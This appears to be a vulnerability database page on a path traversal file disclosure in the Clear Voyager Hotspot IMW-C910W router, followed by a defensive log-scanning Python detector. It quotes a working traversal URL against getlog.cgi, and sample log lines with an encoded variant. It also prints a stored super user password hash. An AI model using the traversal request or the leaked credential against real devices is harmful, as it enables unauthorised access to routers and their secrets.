Vendor: Clear Voyager Hotspot IMW-C910W
By: Damaster
CVSS: 7.5 (HIGH)
File Disclosure
CWE: 200
Product Name: Clear Voyager Hotspot IMW-C910W
Affected Version From: R4383
Affected Version To: R4383
Patch Exists: YES
Related CWE: N/A
CPE: h:sprint:clear_voyager_hotspot_imw-c910w
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2016

Clear Voyager Hotspot IMW-C910W – File Disclosure

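An attacker can exploit a file disclosure vulnerability in the Clear Voyager Hotspot IMW-C910W by sending a specially crafted HTTP request to the vulnerable device. As the PoC in the raw data shows, the request passes `../` path traversal sequences in the `filename` parameter of `/cgi-bin/getlog.cgi`. This can allow the attacker to access sensitive information such as passwords stored on the device.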

Mitigation:

The vendor should ensure that the device is not exposed to the internet and should be kept behind a firewall. Additionally, the device should be updated to the latest version of the software.

Exploit-DB raw data:

- # Exploit Title: clear voyager hotspot IMW-C910W - file disclosure
- # Date: 2016/jul/15
- # Exploit Author: Damaster
- # Vendor Homepage: https://www.sprint.com/
- # Software Link: https://web.archive.org/web/20150526042938/http://www.clearwire.com/downloads/IMW-C910W_V2234_R4383A.bin
- # Version: R4383
-  
- poc : http://192.168.1.1/cgi-bin/getlog.cgi?filename=../../etc/passwd
-  
- vulnerable Device Software Version : R4383
-  
- super user password
- =================
- file : /etc/httpd/super.htpasswd
- content : super:YBfFG25mEAdSg
- =================
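
A defender-side check for the request pattern shown in the PoC above, as an added example that is not part of the original Exploit-DB entry or any vendor code. It assumes requests to the device are recorded in Common Log Format by a proxy or sensor in front of it; the sample log lines are constructed, and the detector also decodes nested percent-encoding, which goes beyond the single case the PoC shows.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a Common Log Format entry (assumed log format).
REQUEST_RE = re.compile(r'^(?P<src>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
CGI_PATH = "/cgi-bin/getlog.cgi"   # endpoint named in the PoC
PARAM = "filename"                 # parameter named in the PoC

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding (e.g. %252e%252e) up to max_rounds."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_suspicious(filename):
    """True when the value climbs out of its directory or is absolute."""
    name = fully_decode(filename).replace("\\", "/")
    return name.startswith("/") or ".." in name.split("/")

def scan(lines):
    """Return (source, decoded filename) for each flagged getlog.cgi request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if fully_decode(url.path).lower() != CGI_PATH:
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            if is_suspicious(value):
                hits.append((m.group("src"), fully_decode(value)))
    return hits

# Constructed sample log lines (not taken from a real device).
SAMPLE_LOG = [
    '192.168.1.23 - - [15/Jul/2016:10:00:01 +0000] "GET /cgi-bin/getlog.cgi?filename=system.log HTTP/1.1" 200 512',
    '192.168.1.50 - - [15/Jul/2016:10:00:07 +0000] "GET /cgi-bin/getlog.cgi?filename=../../etc/passwd HTTP/1.1" 200 733',
    '192.168.1.50 - - [15/Jul/2016:10:00:09 +0000] "GET /cgi-bin/getlog.cgi?filename=%252e%252e%252fetc%252fhttpd%252fsuper.htpasswd HTTP/1.1" 200 20',
    '192.168.1.23 - - [15/Jul/2016:10:00:12 +0000] "GET /index.html?filename=../x HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for src, name in scan(SAMPLE_LOG):
        print(f"{src} requested {name}")
```

A flagged request that returned status 200 on firmware R4383 should be treated as a likely disclosure of the requested file, and the credentials stored on the device rotated after updating.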